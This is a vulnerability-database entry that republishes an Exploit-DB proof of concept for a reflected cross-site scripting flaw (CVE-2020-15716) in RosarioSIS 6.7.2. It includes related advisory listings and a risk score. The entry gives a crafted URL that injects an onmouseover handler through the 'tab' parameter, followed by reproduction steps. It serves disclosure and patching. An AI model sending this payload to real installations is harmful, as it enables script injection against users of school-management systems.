RosarioSIS 6.7.2 - Cross Site Scripting (XSS)

🗓️ 03 Dec 2025 00:00:00Reported by CodeSecLabType

exploitdb🔗 www.exploit-db.com👁 146 Views

RosarioSIS 6.7.2 XSS in user preferences via crafted tab parameter.

Reporter	Title	Published	Views	Family All 11
Circl	CVE-2020-15716	4 Dec 202521:02	–	circl
CNVD	RosarioSIS Cross-Site Scripting Vulnerability (CNVD-2020-42950)	27 Jul 202000:00	–	cnvd
CVE	CVE-2020-15716	15 Jul 202019:00	–	cve
Cvelist	CVE-2020-15716	15 Jul 202019:00	–	cvelist
EUVD	EUVD-2020-7702	7 Oct 202500:30	–	euvd
NVD	CVE-2020-15716	15 Jul 202019:15	–	nvd
OSV	CVE-2020-15716	15 Jul 202019:15	–	osv
Packet Storm	📄 RosarioSIS 6.7.2 Cross Site Scripting	3 Dec 202500:00	–	packetstorm
Prion	Input validation	15 Jul 202019:15	–	prion
RedhatCVE	CVE-2020-15716	16 Apr 202516:01	–	redhatcve

# Exploit Title: RosarioSIS 6.7.2 - Cross Site Scripting (XSS)
# Date: 2025-11-25
# Exploit Author: CodeSecLab
# Vendor Homepage: https://gitlab.com/francoisjacquet/rosariosis
# Software Link: https://gitlab.com/francoisjacquet/rosariosis
# Version: 6.7.2
# Tested on: Windows
# CVE : CVE-2020-15716


Proof Of Concept
http://rosariosis/Modules.php?modname=Users/Preferences.php&tab=%22%20onmouseover%3Dalert%281%29%20x%3D%22

**Conditions**:  
1. User must be authenticated (as shown by the session checks in `Warehous.php`)
2. `modfunc` parameter must **not** be present in the request


Steps to Reproduce:
1. Log in as an admin user.
2. Send the request.
3. Observe the result

03 Dec 2025 00:00Current

6.3Medium risk

Vulners AI Score6.3

CVSS 24.3

CVSS 3.16.1

EPSS0.05557